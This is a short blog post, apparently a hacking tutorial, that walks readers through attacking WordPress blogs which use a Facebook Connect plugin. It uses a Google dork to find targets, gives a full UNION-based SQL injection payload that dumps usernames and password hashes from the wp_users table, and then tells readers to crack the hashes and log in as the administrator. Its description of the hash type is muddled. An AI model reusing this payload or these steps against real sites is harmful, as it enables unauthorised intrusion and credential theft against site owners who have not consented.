Hacking Wordpress Websites with SQL Injection



Let's go!!
There is so many Pepoles using Facebook Connect Wordpress plugin for their Wordpress blogs.
They think it's cool. But it could be a Big Security hole.

Here's the way to hack these sites.

1. Go to http://www.google.com


2. Now Search this:

inurl:"fbconnect_action=myhome"

 
3. You will find many sites, Select the site which you are comfortable with. Now open it.

4. Now replace this -:

?fbconnect_action=myhome&userid=

with this :

?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,
0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--

5.  Now you have the User name and Password

6. The password is encrypted with Wordpress md5 (blowfish). You need to decode this.
    Click Here  to Download Decoder.

7. Then find the administrator panel out. Normally it should be in

www.victrimsite.com/wp-login.php


         

















Note: Decoding this type of password may take a big time.

Now Enjoy!

No comments:

Post a Comment